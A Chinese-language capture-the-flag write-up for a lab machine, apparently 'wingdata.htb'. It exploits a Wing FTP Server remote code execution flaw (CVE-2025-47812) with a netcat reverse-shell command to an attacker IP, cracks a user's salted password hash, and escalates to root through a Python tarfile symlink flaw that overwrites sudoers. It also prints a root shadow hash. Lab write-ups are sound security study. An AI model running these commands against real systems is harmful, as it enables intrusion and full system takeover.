基本信息
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.129.244.63 |
80
需要加hosts:
1 | 10.129.244.63 wingdata.htb |
文件共享相关的:
ftp
client portal是ftp子域名,同样添加hosts后访问,是wing ftp v7.4.3:
CVE-2025-47812
搜索可以找到相关漏洞:
- What the NULL?! Pre-Auth Wing FTP Server RCE … | RCE Security
https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/ - 4m3rr0r/CVE-2025-47812-poc: Wing FTP Server Remote Code Execution (RCE) Exploit (CVE-2025-47812)
https://github.com/4m3rr0r/CVE-2025-47812-poc
打到wingftp shell:
1 | python3 CVE-2025-47812.py -u http://ftp.wingdata.htb/ -c "nc -e /bin/bash 10.10.14.14 4444" |
wingftp
然后常规翻目录,得到hash:
1 | wingftp@wingdata:/opt/wftpserver/Data/1/users$ cat wacky.xml |
然后破解出密码,搜索可以知道是SHA256,默认salt是WingFTP:
- Wing FTP Server Help
https://www.wftpserver.com/help/ftpserver/index.html?compression.htm
1 | hash.txt |
wacky & user flag
得到的密码登录对应的wacky用户:
提权信息
可以sudo运行指定backup脚本:
看脚本就是backup和restore相关的,对文件名和目录都有验证,但可以注意python是3.12.3版本,tarfile可以搜索到已知漏洞,所以我们如果利用这个漏洞在backup文件里写入恶意软链接文件,然后restore释放恶意文件,即可覆盖系统内任意文件
- Python - Tarfile Realpath Overflow Vulnerability · Advisory · google/security-research
https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f
提权 & root flag
所以就是创建一个恶意tar文件来覆写系统文件,例如sudoers:
1 | python3 exploit.py |
exploit.py
1 | import tarfile |
shadow
1 | root:$y$j9T$o4QbpI9MXymg8tQSz73eq0$c1P1OfnBDpSlaHX8xmPTekraDfdl8gj5Xtghz.E5V3A:20394:0:99999:7::: |
参考资料
- What the NULL?! Pre-Auth Wing FTP Server RCE … | RCE Security
https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/ - 4m3rr0r/CVE-2025-47812-poc: Wing FTP Server Remote Code Execution (RCE) Exploit (CVE-2025-47812)
https://github.com/4m3rr0r/CVE-2025-47812-poc - Wing FTP Server Help
https://www.wftpserver.com/help/ftpserver/index.html?compression.htm - Python - Tarfile Realpath Overflow Vulnerability · Advisory · google/security-research
https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f